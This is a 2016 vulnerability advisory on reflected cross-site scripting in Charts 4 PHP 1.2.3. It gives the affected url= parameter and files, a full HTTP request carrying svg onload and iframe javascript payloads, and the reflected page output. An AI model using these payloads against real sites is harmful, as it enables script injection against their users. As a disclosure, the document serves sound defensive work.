Charts 4 PHP 1.2.3 Cross Site Scripting
Posted on 10 February 2016
# Exploit Title: Charts 4 PHP 1.2.3 Cross Site Scripting # Date: 2016/2/7 # Researcher: 1N3 @CrowdShield - https://crowdshield.com # Vendor Homepage: http://www.chartphp.com # Software Link: http://www.chartphp.com # Version: 1.2.3 # CVE : N/A +- --=[Description: Charts 4 PHP version 1.2.3 is vulnerable to multiple reflected cross-site scripting vulnerabilities due to a failure to sanitize user input in several default pages via the url= parameter. +- --=[Affected Params: url= +- --=[Bug Evidence: VULNERABLE CODE: Userinput is passed through function parameters. 9: ⇑ $rss = fetch_rss ($url); 6: $url = $_GET['url']; requires: 8: if($url) Vulnerability is also triggered in: /crowdshield/charts4php/bootstrap/rss/scripts/magpie_debug.php /crowdshield/charts4php/bootstrap/rss/scripts/simple_smarty.php /crowdshield/charts4php/bootstrap/rss/scripts/magpie_slashbox.php /crowdshield/charts4php/bootstrap/rss/rss_fetch.inc /crowdshield/charts4php/bootstrap/rss/rss_parse.inc HTTP REQUEST: GET /charts4php/bootstrap/rss/scripts/magpie_simple.php?url=%22%3E%3Csvg%2Fonload%3Dalert%281%29%3E%27%22--+ HTTP/1.1 Host: host.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://crowdshield.com/charts4php/bootstrap/rss/scripts/magpie_simple.php?url=%3Ciframe+src%3D%22+javascript%3Aalert%28%27https%3A%2F%2Fcrowdshield.com%27%29%3B%22%3E%3C%2Fiframe%3E+ Cookie: __cfduid=d89da9abfef7f775eadafcdc1008eac6b1454814806; __utma=242435792.1300894982.1454814681.1454885335.1454891081.5; __utmz=242435792.1454814681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _ga=GA1.2.1300894982.1454814681; __atuvc=1%7C5%2C5%7C6; PHPSESSID=qlct9igheoh2ofg7bo8g8ss691; __utmb=242435792.31.10.1454891081; __utmc=242435792; __atuvs=56b7e04adb06138a001 Connection: close Channel: <p><ul></ul> <form> RSS URL: <input type="text" size="30" name="url" value=""><svg/onload=alert(1)>'"-- "><br /> <input type="submit" value="Parse RSS"> </form>